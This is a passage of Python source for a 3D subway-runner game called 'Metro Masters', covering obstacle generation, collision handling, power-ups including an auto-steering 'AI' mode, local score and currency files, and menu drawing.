self.loadImage(\"Logo.png\")\n self.logo = self.scaleImage(self.logo, 1.75)\n self.button1 = self.loadImage('Button1.png')\n self.button2 = self.loadImage('Button2.png')\n self.button3 = self.loadImage('Button3.png')\n self.button1 = self.scaleImage(self.button1, .75)\n self.button2 = self.scaleImage(self.button2, .75)\n self.button3 = self.scaleImage(self.button3, .75)\n self.magnetImage = self.loadImage('Magnet.png')\n self.speedyBootsImage = self.loadImage('SpeedyBoots.png')\n self.multiplierImage = self.loadImage('Multiplier.png')\n self.AIImage = self.loadImage('AI.png')\n self.magnetImage = self.scaleImage(self.magnetImage, .65)\n self.AIImage = self.scaleImage(self.AIImage, .65)\n self.speedyBootsImage = self.scaleImage(self.speedyBootsImage, .65)\n self.multiplierImage = self.scaleImage(self.multiplierImage, .65)\n\n def createTrain(self, lane, trainLength = .3, speed = .03): \n if lane == 0:\n p1 = Point(self, .025, 1, 1.14)\n p2 = Point(self, .3, 1, 1.14)\n p3 = Point(self, .3, 1, 1.14 + trainLength)\n p4 = Point(self, .025, 1, 1.14 + trainLength)\n elif lane == 1:\n p1 = Point(self, .5-(.275/2), 1, 1.14)\n p2 = Point(self, .5+(.275/2), 1, 1.14)\n p3 = Point(self, .5+(.275/2), 1, 1.14 + trainLength)\n p4 = Point(self, .5-(.275/2), 1, 1.14 + trainLength)\n elif lane == 2:\n p1 = Point(self, 1-.025, 1, 1.14)\n p2 = Point(self,.7, 1, 1.14)\n p3 = Point(self, .7, 1, 1.14 + trainLength)\n p4 = Point(self, 1-.025, 1, 1.14 + trainLength)\n\n color = random.choice([\"cyan\", \"purple\"])\n surfaces = []\n surfaces += [Surface(self, [p1, p2, p3, p4], color)]\n\n return Train(self, surfaces, 0, self.levelHeight, lane, speed)\n\n def createTunnel(self, tunnelLength = .1, speed = 0):\n\n tunnelObjects = []\n\n p1 = Point(self, -.5, 1, 1.14)\n p2 = Point(self, -.1, 1, 1.14)\n p3 = Point(self, -.1, 1, 1.14 + tunnelLength)\n p4 = Point(self, -.5, 1, 1.14 + tunnelLength)\n\n surfaces = []\n color = \"gray\"\n \n tunnelObjects += [Decoration(self, [Surface(self, [p1, p2, p3, p4], color)], 0, self.levelHeight*3, -1, 0)]\n\n p1 = Point(self, 1.1, 1, 1.14)\n p2 = Point(self, 1.5, 1, 1.14)\n p3 = Point(self, 1.5, 1, 1.14 + tunnelLength)\n p4 = Point(self, 1.1, 1, 1.14 + tunnelLength)\n\n tunnelObjects += [Decoration(self, [Surface(self, [p1, p2, p3, p4], color)], 0, self.levelHeight*3, 3, 0)]\n\n height = self.levelHeight * 3\n p1 = Point(self, -.5, 1, 1.14,h = height)\n p2 = Point(self, 1.5, 1, 1.14, h = height)\n p3 = Point(self, 1.5, 1, 1.14 + tunnelLength, h = height)\n p4 = Point(self, -.5, 1, 1.14 + tunnelLength, h = height)\n\n tunnelObjects += [Decoration(self, [Surface(self, [p1, p2, p3, p4], color)], 0, height + self.levelHeight, 1, 0)]\n\n return tunnelObjects\n\n def createBridge(self, houseLength = .025, speed = 0):\n\n houseObjects = []\n \n color = \"red\"\n\n p1 = Point(self, -1.75, 1, 1.14)\n p2 = Point(self, -1.25, 1, 1.14)\n p3 = Point(self, -1.25, 1, 1.14 + houseLength)\n p4 = Point(self, -1.75, 1, 1.14 + houseLength)\n \n houseObjects += [Decoration(self, [Surface(self, [p1, p2, p3, p4], color)], 0, self.levelHeight*10, -2, 0, False)]\n\n p1 = Point(self, 2.25, 1, 1.14)\n p2 = Point(self, 2.75, 1, 1.14)\n p3 = Point(self, 2.75, 1, 1.14 + houseLength)\n p4 = Point(self, 2.25, 1, 1.14 + houseLength)\n\n \n houseObjects += [Decoration(self, [Surface(self, [p1, p2, p3, p4], color)], 0, self.levelHeight*10, 4, 0, False)]\n\n return houseObjects\n\n\n def createLadder(self, lane, barrierLength = .05, speed = .03):\n\n ladderObjects = []\n height = -.06\n for i in range(-1, 4, 2):\n height += .12\n if lane == 0:\n p1 = Point(self, .025, 1, 1.14 - barrierLength, h = height)\n p2 = Point(self, .3, 1, 1.14 - barrierLength, h = height)\n p3 = Point(self, .3, 1, 1.14, h = height)\n p4 = Point(self, .025, 1, 1.14, h = height)\n elif lane == 1:\n p1 = Point(self, .5-(.275/2), 1, 1.14 - barrierLength, h = height)\n p2 = Point(self, .5+(.275/2), 1, 1.14 - barrierLength, h = height)\n p3 = Point(self, .5+(.275/2), 1, 1.14, h = height)\n p4 = Point(self, .5-(.275/2), 1, 1.14,h = height)\n elif lane == 2:\n p1 = Point(self, 1-.025, 1, 1.14+barrierLength,h = height)\n p2 = Point(self,.7, 1, 1.14+barrierLength,h = height)\n p3 = Point(self, .7, 1, 1.14,h = height)\n p4 = Point(self, 1-.025, 1, 1.14,h = height)\n\n color = random.choice([\"grey\"])\n surfaces = []\n surfaces += [Surface(self, [p1, p2, p3, p4], color)]\n if i == -1:\n ladderObjects += [Ladder(self, surfaces, 0, height + .04, lane, speed)] \n else:\n ladderObjects += [Ladder(self, surfaces, 0, height + .04, lane, speed)] \n\n\n\n return ladderObjects\n \n def createJumpBarrier(self, lane, barrierLength = .05):\n if lane == 0:\n p1 = Point(self, .025, 1, 1.14)\n p2 = Point(self, .3, 1, 1.14)\n p3 = Point(self, .3, 1, 1.14 + barrierLength)\n p4 = Point(self, .025, 1, 1.14 + barrierLength)\n elif lane == 1:\n p1 = Point(self, .5-(.275/2), 1, 1.14)\n p2 = Point(self, .5+(.275/2), 1, 1.14)\n p3 = Point(self, .5+(.275/2), 1, 1.14 + barrierLength)\n p4 = Point(self, .5-(.275/2), 1, 1.14+ barrierLength)\n elif lane == 2:\n p1 = Point(self, 1-.025, 1, 1.14)\n p2 = Point(self,.7, 1, 1.14)\n p3 = Point(self, .7, 1, 1.14 + barrierLength)\n p4 = Point(self, 1-.025, 1, 1.14 + barrierLength)\n\n color = random.choice([\"pink\"])\n surfaces = []\n surfaces += [Surface(self, [p1, p2, p3, p4], color)]\n\n return JumpBarrier(self, surfaces, 0, .2, lane, 0)\n\n def createDuckBarrier(self, lane, barrierLength = .05):\n height = .2\n if lane == 0:\n p1 = Point(self, .025, 1, 1.14, h = height)\n p2 = Point(self, .3, 1, 1.14,h = height)\n p3 = Point(self, .3, 1, 1.14 + barrierLength,h = height)\n p4 = Point(self, .025, 1, 1.14 + barrierLength,h = height)\n elif lane == 1:\n p1 = Point(self, .5-(.275/2), 1, 1.14,h = height)\n p2 = Point(self, .5+(.275/2), 1, 1.14,h = height)\n p3 = Point(self, .5+(.275/2), 1, 1.14 + barrierLength,h = height)\n p4 = Point(self, .5-(.275/2), 1, 1.14+ barrierLength,h = height)\n elif lane == 2:\n p1 = Point(self, 1-.025, 1, 1.14,h = height)\n p2 = Point(self,.7, 1, 1.14,h = height)\n p3 = Point(self, .7, 1, 1.14 + barrierLength,h = height)\n p4 = Point(self, 1-.025, 1, 1.14 + barrierLength,h = height)\n\n color = random.choice([\"red\"])\n surfaces = []\n surfaces += [Surface(self, [p1, p2, p3, p4], color)]\n part1 = DuckBarrier(self, surfaces, 0, height + .2, lane, 0)\n\n if lane == 0:\n p1 = Point(self, .025, 1, 1.14)\n p2 = Point(self, .05, 1, 1.14)\n p3 = Point(self, .05, 1, 1.14 + barrierLength)\n p4 = Point(self, .025, 1, 1.14 + barrierLength)\n elif lane == 1:\n p1 = Point(self, .5-(.275/2), 1, 1.14)\n p2 = Point(self, .5-(.275/2) + .025, 1, 1.14)\n p3 = Point(self, .5-(.275/2) + .025, 1, 1.14 + barrierLength)\n p4 = Point(self, .5-(.275/2), 1, 1.14+ barrierLength)\n elif lane == 2:\n p1 = Point(self, 1-.025, 1, 1.14)\n p2 = Point(self,1-.05, 1, 1.14)\n p3 = Point(self, 1-.05, 1, 1.14 + barrierLength)\n p4 = Point(self, 1-.025, 1, 1.14 + barrierLength)\n\n color = random.choice([\"red\"])\n surfaces = []\n surfaces += [Surface(self, [p1, p2, p3, p4], color)]\n part2 = Decoration(self, surfaces, 0, height + .2, lane, 0)\n\n if lane == 0:\n p1 = Point(self, .3-.025, 1, 1.14)\n p2 = Point(self, .3, 1, 1.14)\n p3 = Point(self, .3, 1, 1.14 + barrierLength)\n p4 = Point(self, .3-.025, 1, 1.14 + barrierLength)\n elif lane == 1:\n p1 = Point(self, .5+(.275/2), 1, 1.14)\n p2 = Point(self, .5+(.275/2) - .025, 1, 1.14)\n p3 = Point(self, .5+(.275/2) - .025, 1, 1.14 + barrierLength)\n p4 = Point(self, .5+(.275/2), 1, 1.14+ barrierLength)\n elif lane == 2:\n p1 = Point(self, .7, 1, 1.14)\n p2 = Point(self,.725, 1, 1.14)\n p3 = Point(self, .725, 1, 1.14 + barrierLength)\n p4 = Point(self, .7, 1, 1.14 + barrierLength)\n\n color = random.choice([\"red\"])\n surfaces = []\n surfaces += [Surface(self, [p1, p2, p3, p4], color)]\n part3 = Decoration(self, surfaces, 0, height + .2, lane, 0) \n\n return [part1, part2, part3]\n\n def createTrainWrapper(self, lane, speed):\n self.objects.insert(0,self.createTrain(lane, .3, speed))\n\n def createLadderWrapper(self, lane, speed):\n contents = self.createLadder(lane, .01, speed)\n for content in contents:\n try:\n self.objects.insert(12,content)\n except:\n self.objects.insert(1,content)\n\n def createTunnelWrapper(self):\n contents = self.createTunnel()\n for content in contents:\n self.objects.insert(0,content)\n\n def createBridgeWrapper(self):\n contents = self.createBridge()\n for content in contents:\n self.objects.insert(0,content)\n\n\n def createDuckBarrierWrapper(self, lane):\n contents = self.createDuckBarrier(lane, .01)\n for content in contents:\n self.objects.insert(0,content)\n\n def createJumpBarrierWrapper(self, lane):\n self.objects.insert(0,self.createJumpBarrier(lane, .01))\n\n def randomizeMoves(self):\n newOrder = []\n clone = copy.copy(self.possibleMoves)\n while len(clone) > 0:\n newOrder += [clone.pop(random.randint(0,len(clone)-1))]\n return newOrder\n\n def isLegal(self, moves):\n for move in moves:\n if moves.count(move) > 1:\n return False\n \n state = [[False, False, False], [False, False, False], [False, False, False]]\n\n for move in moves:\n lane = int(move[-1])\n if move.startswith(\"LADDER\"):\n if state[lane] != [True, True, True]:\n return False\n\n for loc, spot in enumerate(state[lane]):\n if move.startswith(\"TRAIN\"):\n if spot == True:\n return False\n else:\n state[lane][loc] = True\n if state == [[True, True, True], [True, True, True], [True, True, True]]:\n return False\n elif move.startswith(\"DUCK\"):\n if str(loc) in '12':\n if spot == True:\n return False\n else:\n state[lane][loc] = True\n elif move.startswith(\"JUMP\"):\n if str(loc) in '01':\n if spot == True:\n return False\n else:\n state[lane][loc] = True\n \n return True\n\n #advanced recursive backtracking\n def generateSection(self, target, moves = None, number = 0):\n\n if moves == None:\n moves = []\n\n if number >= target:\n return moves\n\n scrambledMoves = self.randomizeMoves()\n\n for move in scrambledMoves:\n moves += [move]\n\n if self.isLegal(moves):\n result = self.generateSection(target, moves, number + 1)\n if result != None:\n return result\n moves.remove(move)\n\n return None\n\n \n def timerFired(self):\n if self.transitioning == True:\n self.transitionFrame += self.dF\n\n if self.transitionFrame == self.transitionFrames:\n self.currentMode = self.toMode\n \n if self.toMode == \"end\":\n self.endActivated()\n if self.toMode == \"play\":\n self.appStarted()\n self.currentMode = \"play\"\n self.transitionFrame = self.transitionFrames\n self.transitioning = True\n\n self.dF = -1\n \n if self.transitionFrame < 0:\n self.transitionFrame = 0\n self.dF = 1\n self.transitioning = False\n\n\n if self.currentMode == \"play\":\n if self.runner.alive:\n self.timeElapsed += self.timerDelay\n if self.runner.currentPowerUp == \"DOUBLE POINTS\":\n self.score += int(self.timerDelay * self.multiplier * self.speed * 2)\n else:\n self.score += int(self.timerDelay * self.multiplier * self.speed)\n self.scrollZ -= .3\n self.runner.powerUpTimeLeft = max(self.runner.powerUpTimeLeft - self.timerDelay, 0)\n if self.runner.powerUpTimeLeft <= 0 and self.runner.currentPowerUp != None:\n if self.runner.currentPowerUp == \"SPEEDY BOOTS\":\n self.runner.forceField = False #remove forcefield\n if self.runner.currentPowerUp == \"AI\":\n self.objects = []\n self.runner.currentPowerUp = None\n\n renderedObjects = []\n objectsInSector = [[0,0],[0,0],[0,0]] #there a 6 sectors (2 per lane)\n\n for obj in self.objects:\n \n obj.changeDistance(-self.speed)\n if not obj.visible:\n obj.visible = True\n\n frontPos, endPos, delPos = 0,0,0\n \n if isinstance(obj, Ladder):\n frontPos, endPos, delPos = -11, -11.4, -15\n elif isinstance(obj, Train):\n frontPos, endPos, delPos = -11.1, -14, -15\n elif isinstance(obj, JumpBarrier):\n frontPos, endPos, delPos = -11.2, -11.4, -13\n elif isinstance(obj, DuckBarrier):\n frontPos, endPos, delPos = -11.2, -11.4, -13\n\n level = None\n \n if obj.speed > 0: #if train collides with another object, stop it\n if isinstance(obj, (Ladder, Train)):\n for obj2 in self.objects:\n if obj2.lane == obj.lane:\n if isinstance(obj2, (JumpBarrier, DuckBarrier, Train)):\n if .05 < abs(obj2.zDistance - obj.zDistance) < .1:\n if not(isinstance(obj, Ladder) and isinstance(obj2, Train)):\n obj.speed = 0\n\n if endPos < obj.zDistance < frontPos:\n \n #first ignore all collisions in the lane\n for i in range(2):\n for j in range(3):\n self.collisionBox[obj.lane][i][j] = False\n\n #now determine where the collisions are\n if isinstance(obj, (Train, Ladder)):\n self.collisionBox[obj.lane][0][0] = True\n self.collisionBox[obj.lane][0][1] = True\n self.collisionBox[obj.lane][0][2] = True\n level = 0\n \n elif isinstance(obj, JumpBarrier):\n self.collisionBox[obj.lane][0][0] = True\n self.collisionBox[obj.lane][0][1] = True\n level = 0\n elif isinstance(obj, DuckBarrier):\n self.collisionBox[obj.lane][0][1] = True\n self.collisionBox[obj.lane][0][2] = True\n level = 0\n\n #special collisions (something else happens besides ending game)\n if self.runner.currentLane == obj.lane:\n if isinstance(obj, Ladder):\n #puts the player on the top\n for i in range(2):\n for j in range(3):\n if i == j == 1: #top row default stance:\n self.runner.collisionBox[obj.lane][i][j] = True\n else:\n self.runner.collisionBox[obj.lane][i][j] = False\n self.runner.climbing = True\n level = 0\n \n objectsInSector[obj.lane][level] += 1\n\n if isinstance(obj, Decoration):\n if obj.zDistance > -15: #in screen\n renderedObjects += [obj]\n else:\n if obj.zDistance > delPos: #in screen\n renderedObjects += [obj]\n self.objects = renderedObjects\n\n for i in range(3):\n for j in range(2):\n if objectsInSector[i][j] == 0: #if there are NO OTHER OBJECTS in the sector\n for k in range(3):\n self.collisionBox[i][j][k] = False\n\n renderedCoins = []\n for coin in self.coins:\n coin.changeDistance(-self.speed)\n if not coin.visible:\n coin.visible = True\n if coin.z > 0: #still on screen\n renderedCoins += [coin]\n else:\n coinX, coinY = coin.coordinatesToAbsolute()\n runnerX, runnerY = self.runner.coordinatesToAbsolute()\n if coin.theText == \"?\":\n if abs(runnerX-coinX) < coin.r*16 and abs(runnerY-coinY) < coin.r*16:\n self.runner.currentPowerUp = random.choice(self.allPowerUps)\n self.runner.powerUpTimeLeft = getUpgrade(self.runner.currentPowerUp)\n if self.runner.currentPowerUp == \"SPEEDY BOOTS\":\n self.runner.forceField = True\n else:\n if self.runner.currentPowerUp == \"MAGNET\":\n self.coinsCollected += 5\n elif abs(runnerX-coinX) < coin.r*16 and abs(runnerY-coinY) < coin.r*16:\n self.coinsCollected += 1\n\n self.coins = renderedCoins\n \n renderedPlanks = []\n for plank in self.planks:\n plank.changeDistance(-self.speed)\n if not plank.visible:\n plank.visible = True\n if plank.zDistance > -5: #still on screen\n renderedPlanks += [plank]\n self.planks = renderedPlanks\n\n generateNow = int(self.timerDelay * (7-self.difficulty) * 20)\n\n if self.timeElapsed% generateNow == 0:\n givenSection = self.generateSection(random.randint(max(self.difficulty-3, 1), self.difficulty))\n prevSpeed = [0,0,0] #makes sure ladders are attached to front of trains\n for move in givenSection:\n chooseLane = int(move[-1])\n obj = move[:-1]\n if obj == \"TRAIN\":\n speed = random.randint(25, 35 + (max(self.difficulty-3,0) * 6))/1000\n prevSpeed[chooseLane] = speed\n self.createTrainWrapper(chooseLane, speed)\n elif obj == \"LADDER\":\n self.createLadderWrapper(chooseLane, prevSpeed[chooseLane])\n elif obj == \"JUMP\":\n self.createJumpBarrierWrapper(chooseLane)\n elif obj == \"DUCK\":\n self.createDuckBarrierWrapper(chooseLane)\n\n if self.timeElapsed%1000 == 0:\n self.speed += .0005\n if self.runner.currentPowerUp == \"SPEEDY BOOTS\":\n if self.oldSpeed == 0:\n self.oldSpeed = self.speed\n self.speed = .16\n else:\n if almostEqual(self.speed, .1605):\n self.speed = self.oldSpeed\n self.oldSpeed = 0\n self.speed = min(self.speed, .12)\n \n if self.speed < .02: self.difficulty = 1\n elif self.speed < .04: self.difficulty = 1\n elif self.speed < .06: self.difficulty = 2\n elif self.speed < .08: self.difficulty = 3\n elif self.speed < .1: self.difficulty = 4\n else: self.difficulty = 5 \n\n if self.timeElapsed%500 == 0:\n self.createRailPlanks()\n\n if self.timeElapsed%10000 == 0:\n self.createTunnelWrapper()\n\n if self.timeElapsed%2000 == 100 and self.map == \"GOLDEN GATE BRIDGE\":\n self.createBridgeWrapper()\n\n if self.timeElapsed%750 == 0:\n if self.timeElapsed%24000 == 12000:\n self.createPowerUp()\n else:\n self.createCoin()\n\n if self.runner.climbing:\n self.runner.climbTick()\n if self.runner.jumping:\n self.runner.jumpTick()\n elif self.runner.ducking:\n self.runner.duckTick()\n else:\n self.focus[1] = self.defaultHorizonLevel\n\n if self.runner.switchingLanes != 0:\n if self.runner.currentPowerUp == \"AI\":\n animTime = 90\n else:\n animTime = 100\n distanceMoved = self.width/2.5\n percentFinished = self.laneSwitchTime/animTime\n self.laneSwitchTime += self.timerDelay\n if percentFinished > 1:\n percentFinished = 1\n self.cameraPos[0] = self.storedOldCameraPos + self.runner.switchingLanes*distanceMoved*math.sin(percentFinished)\n self.focus[0] = self.storedOldCameraFoc + self.runner.switchingLanes *distanceMoved*math.sin(percentFinished)*1.1 #1.1 = how much is the camera rotating?\n\n if percentFinished == 1:\n self.runner.switchingLanes = 0\n self.laneSwitchTime = 0\n self.storedOldCameraPos = self.cameraPos[0]\n self.storedOldCameraFoc = self.focus[0]\n\n self.runner.checkFall()\n self.checkCollisions()\n\n def checkCollisions(self):\n #don't bother checking collisions if there is nothing to collide with!\n if self.collisionBox != [\n [[False, False, False],[False, False, False]], \n [[False, False, False],[False, False, False]],\n [[False, False, False],[False, False, False]]]:\n if not self.runner.climbing:\n for i in range(3):\n for j in range(2):\n for k in range(3):\n if self.collisionBox[i][j][k] == self.runner.collisionBox[i][j][k] == True:\n if self.runner.currentPowerUp == \"AI\":\n if self.collisionBox[self.runner.currentLane][self.runner.fLevel] == [True, True, False]:\n self.movementInput(\"Up\")\n elif self.collisionBox[self.runner.currentLane][self.runner.fLevel] == [False, True, True]:\n self.movementInput(\"Down\") \n elif self.collisionBox[self.runner.currentLane][self.runner.fLevel] == [True, True, True]:\n if self.runner.currentLane == 0:\n self.movementInput(\"Right\")\n elif self.runner.currentLane == 1:\n if self.collisionBox[0][self.runner.fLevel] == [True, True, True]:\n self.movementInput(\"Right\")\n else:\n self.movementInput(\"Left\")\n elif self.runner.currentLane == 2:\n self.movementInput(\"Left\")\n else:\n if self.runner.forceField:\n self.runner.forceField = False\n self.objects = [] #clear everything\n if self.runner.currentPowerUp == \"SPEEDY BOOTS\":\n self.runner.currentPowerUp = None\n else:\n self.runner.alive = False\n self.toEnd()\n elif self.runner.currentPowerUp == \"AI\":\n if random.randint(1, 30) == 20:\n direction = random.choice([\"Left\",\"Right\"])\n if direction == \"Right\" and self.runner.currentLane < 2 and self.collisionBox[self.runner.currentLane+1][self.runner.fLevel] == [False, False, False]:\n self.movementInput(\"Right\")\n if direction == \"Left\" and self.runner.currentLane > 0 and self.collisionBox[self.runner.currentLane-1][self.runner.fLevel] == [False, False, False]:\n self.movementInput(\"Left\")\n \n \n \n \n\n\n def movementInput(self, direction):\n if direction == \"w\" or direction == \"Up\":\n if not self.runner.jumping and not self.runner.ducking:\n self.runner.jumping = True\n if direction == \"s\" or direction == \"Down\":\n if not self.runner.jumping and not self.runner.ducking:\n self.runner.ducking = True\n if direction == \"a\" or direction == \"Left\":\n if self.runner.switchingLanes == 0 and self.runner.changeLane(-1):\n self.runner.switchingLanes = -1\n if direction == \"d\" or direction == \"Right\":\n if self.runner.switchingLanes == 0 and self.runner.changeLane(1):\n self.runner.switchingLanes = 1\n\n def keyPressed(self, event):\n if self.runner.currentPowerUp != \"AI\":\n self.movementInput(event.key)\n\n def createLanesAndRails(self):\n lanes = []\n rails = []\n laneWidth = 1/3 #fraction of total width\n railWidth = 1/27 #fraction of total width\n for i in range(3):\n if self.runner.currentPowerUp == \"SPEEDY BOOTS\":\n color = \"cyan\"\n elif self.runner.currentPowerUp == \"DOUBLE POINTS\":\n color = \"yellow\"\n elif self.runner.currentPowerUp == \"MAGNET\":\n color = \"pink\"\n else:\n color = \"orange\"\n if i%2 == 0:\n if self.runner.currentPowerUp == \"SPEEDY BOOTS\":\n color = \"cyan2\"\n elif self.runner.currentPowerUp == \"DOUBLE POINTS\":\n color = \"gold\"\n elif self.runner.currentPowerUp == \"MAGNET\":\n color = \"pink2\"\n else:\n color = \"darkorange\"\n x0 = (laneWidth)*i\n x1 = (laneWidth)*(i+1)\n lanes += [Surface(self, [Point(self, x0,1,0), Point(self, x1,1,0), Point(self, x1,1,1), Point(self, x0,1,1)], color)]\n\n color = \"gray\"\n rails += [Surface(self, [Point(self, x0 + railWidth,1,0), Point(self, x0 + 2*railWidth,1,0), Point(self, x0 + railWidth,1,1), Point(self, x0 + 2*railWidth,1,1)], color)]\n rails += [Surface(self, [Point(self, x1 - 2*railWidth,1,0), Point(self, x1 - railWidth,1,0), Point(self, x1 - railWidth,1,1), Point(self, x1 - 2*railWidth,1,1)], color)]\n \n if self.map == \"GOLDEN GATE BRIDGE\":\n lanes += [Surface(self, [Point(self, -6*laneWidth,1,0), Point(self, -2*laneWidth,1,0), Point(self, -2*laneWidth,1,1), Point(self, -6*laneWidth,1,1)], \"red4\")]\n lanes += [Surface(self, [Point(self, 1+2*laneWidth,1,0), Point(self, 1+6*laneWidth,1,0), Point(self, 1+6*laneWidth,1,1), Point(self, 1+2*laneWidth,1,1)], \"red4\")]\n lanes += [Surface(self, [Point(self, -2*laneWidth,1,0), Point(self, 0,1,0), Point(self, 0,1,1), Point(self, -2*laneWidth,1,1)], \"seashell4\")]\n lanes += [Surface(self, [Point(self, 1,1,0), Point(self, 1+laneWidth*2,1,0), Point(self, 1+laneWidth*2,1,1), Point(self, 1,1,1)], \"seashell4\")]\n\n lanes += [Surface(self, [Point(self, -4*laneWidth,-1.4,0), Point(self, -1.5*laneWidth,-1.4,0), Point(self, -1.5*laneWidth,-1.4,1), Point(self, -4*laneWidth,-1.4,1)], \"red3\")]\n lanes += [Surface(self, [Point(self, 1.5*laneWidth + 1,-1.4,0), Point(self, 4*laneWidth + 1,-1.4,0), Point(self, 4*laneWidth + 1,-1.4,1), Point(self, 1.5*laneWidth + 1,-1.4,1)], \"red3\")]\n elif self.map == \"MALIBU\":\n lanes += [Surface(self, [Point(self, -4*laneWidth,1,0), Point(self, -2*laneWidth,1,0), Point(self, -2*laneWidth,1,1), Point(self, -4*laneWidth,1,1)], \"gold\")]\n lanes += [Surface(self, [Point(self, 1+2*laneWidth,1,0), Point(self, 1+4*laneWidth,1,0), Point(self, 1+4*laneWidth,1,1), Point(self, 1+2*laneWidth,1,1)], \"gold\")]\n lanes += [Surface(self, [Point(self, -2*laneWidth,1,0), Point(self, 0,1,0), Point(self, 0,1,1), Point(self, -2*laneWidth,1,1)], \"yellow green\")]\n lanes += [Surface(self, [Point(self, 1,1,0), Point(self, 1+laneWidth*2,1,0), Point(self, 1+laneWidth*2,1,1), Point(self, 1,1,1)], \"yellow green\")]\n\n lanes += [Surface(self, [Point(self, -6*laneWidth,-1.4,0), Point(self, -1.5*laneWidth,-1.4,0), Point(self, -1.5*laneWidth,-1.4,1), Point(self, -6*laneWidth,-1.4,1)], \"plum2\")]\n lanes += [Surface(self, [Point(self, 1.5*laneWidth + 1,-1.4,0), Point(self, 6*laneWidth + 1,-1.4,0), Point(self, 6*laneWidth + 1,-1.4,1), Point(self, 1.5*laneWidth + 1,-1.4,1)], \"plum2\")]\n\n return lanes, rails\n\n def createCoin(self):\n newCoins = []\n\n laneWidth = 1/3\n newCoins += [FocusedCircle(self, (laneWidth/2)+(random.randint(0,2) *laneWidth), 1, .7, \"$\", 5, \"yellow\", .1)]\n \n self.coins += newCoins\n\n def createPowerUp(self):\n newCoins = []\n\n laneWidth = 1/3\n newCoins += [FocusedCircle(self, (laneWidth/2)+(random.randint(0,2) *laneWidth), 1, .7, \"?\", 8, \"purple\", .1,)]\n \n self.coins += newCoins\n\n def createRailPlanks(self):\n for i in range(3):\n color = \"darkorange4\"\n\n laneWidth = 1/3 #fraction of total width\n plankCut = 1/36\n plankThickness = .01\n\n x0 = (laneWidth)*i\n x1 = (laneWidth)*(i+1)\n \n start = .4 + i*.05\n \n surfaces = [Surface(self, [Point(self, x0 + plankCut,1,start), Point(self, x1-plankCut,1,start), Point(self, x1-plankCut,1,start+plankThickness), Point(self, x0+plankCut,1,start+plankThickness)], color)]\n self.planks += [rectPrism(self, surfaces, 0, 0)] #heightless\n\n #CLICKING BUTTONS\n def toPlay(self):\n if self.transitionFrame == 0:\n if readFile('Upgrades.txt') == \"\" or readFile('Currency.txt') == \"\" or readFile('HighScores.txt') == \"\":\n getCurrency()\n getUpgrade(\"SPEEDY BOOTS\")\n if readFile('HighScores.txt') == \"\":\n defaultNPCs = \"Easy Lily-2500\\nExpert Dexter-50000\\nMaster Baxter-100000\\nSkilled Jill-7000\\nAdvanced Franz-20000\\n\"\n writeFile('HighScores.txt', defaultNPCs)\n self.toMode = \"instructions\"\n self.transitionFrame = 0\n self.transitioning = True\n else:\n self.toMode = \"play\"\n self.transitionFrame = 0\n self.transitioning = True\n\n def toShop(self):\n if self.transitionFrame == 0:\n self.toMode = \"shop\"\n self.transitionFrame = 0\n self.transitioning = True\n\n def toHelp(self):\n if self.transitionFrame == 0:\n self.toMode = \"help\"\n self.transitionFrame = 0\n self.transitioning = True\n\n def toScores(self):\n if self.transitionFrame == 0:\n self.toMode = \"scores\"\n self.transitionFrame = 0\n self.transitioning = True\n\n def toEnd(self):\n if self.transitionFrame == 0:\n self.toMode = \"end\"\n self.transitionFrame = 0\n self.transitioning = True\n\n def toHome(self):\n if self.transitionFrame == 0:\n self.toMode = \"home\"\n self.transitionFrame = 0\n self.transitioning = True\n\n def upgradeSpeedyBoots(self):\n upgradePowerUp(\"SPEEDY BOOTS\")\n\n def upgradeMagnet(self):\n upgradePowerUp(\"MAGNET\")\n\n def upgradeDoublePoints(self):\n upgradePowerUp(\"DOUBLE POINTS\")\n\n def upgradeAI(self):\n upgradePowerUp(\"AI\")\n\n #modeActivated\n\n def endActivated(self):\n\n if readFile('HighScores.txt') == \"\":\n defaultNPCs = \"Easy Lily-2500\\nExpert Dexter-50000\\nMaster Baxter-100000\\nSkilled Jill-7000\\nAdvanced Franz-20000\\n\"\n writeFile('HighScores.txt', defaultNPCs)\n\n newScore(self.score)\n self.personalHighest = getBestScore(\"You\")\n changeCurrency(self.coinsCollected)\n\n\n\n\n\n #all code below here draws the graphics.. \n # ALL MODES ARE IN HERE, TO FUTURE SELF, \n # SO CODE MAY LOOK CHAOTIC (but in reality it isn't)\n\n\n def redrawAll(self, canvas):\n\n if self.currentMode == \"home\":\n canvas.create_image(self.cx, self.cy, image = ImageTk.PhotoImage(self.background))\n canvas.create_image(self.cx, self.cy/2, image = ImageTk.PhotoImage(self.logo))\n\n buttonCenter = (self.cx/2, self.cy*1.2)\n canvas.create_rectangle(buttonCenter[0] - 150, buttonCenter[1] - 75, buttonCenter[0] + 150, buttonCenter[1] + 75, fill = \"\", outline = \"\", onClick = self.toPlay)\n canvas.create_image(buttonCenter, image = ImageTk.PhotoImage(self.button1))\n canvas.create_text(buttonCenter[0], buttonCenter[1]-7, text = \"START\", font = f\"Constantia 40\")\n\n buttonCenter = (self.cx*1.5, self.cy*1.2)\n canvas.create_rectangle(buttonCenter[0] - 150, buttonCenter[1] - 75, buttonCenter[0] + 150, buttonCenter[1] + 75, fill = \"\", outline = \"\", onClick = self.toShop)\n canvas.create_image(buttonCenter, image = ImageTk.PhotoImage(self.button2))\n canvas.create_text(buttonCenter[0], buttonCenter[1]-7, text = \"SHOP\", font = f\"Constantia 40\")\n\n buttonCenter = (self.cx/2, self.cy*1.8)\n canvas.create_rectangle(buttonCenter[0] - 150, buttonCenter[1] - 75, buttonCenter[0] + 150, buttonCenter[1] + 75, fill = \"\", outline = \"\", onClick = self.toScores)\n canvas.create_image(buttonCenter, image = ImageTk.PhotoImage(self.button3))\n canvas.create_text(buttonCenter[0], buttonCenter[1]-7, text = \"SCORES\", font = f\"Constantia 40\")\n\n buttonCenter = (self.cx*1.5, self.cy*1.8)\n canvas.create_rectangle(buttonCenter[0] - 150, buttonCenter[1] - 75, buttonCenter[0] + 150, buttonCenter[1] + 75, fill = \"\", outline = \"\", onClick = self.toHelp)\n canvas.create_image(buttonCenter, image = ImageTk.PhotoImage(self.button2))\n canvas.create_text(buttonCenter[0], buttonCenter[1]-7, text = \"HELP\", font = f\"Constantia 40\")\n\n\n\n elif self.currentMode == \"instructions\":\n canvas.create_image(self.cx, self.cy, image = ImageTk.PhotoImage(self.background))\n buttonCenter = (self.cx, self.cy/6)\n canvas.create_text(buttonCenter[0], buttonCenter[1]-7, text = \"INSTRUCTIONS\", font = f\"Constantia 60\")\n theText = \"\"\"You seem new here... Welcome to Metro Masters!\nUse the arrow keys or WASD to navigate through the subways.\nJump using up arrow/w and Duck using down arrow/s!\nAvoid 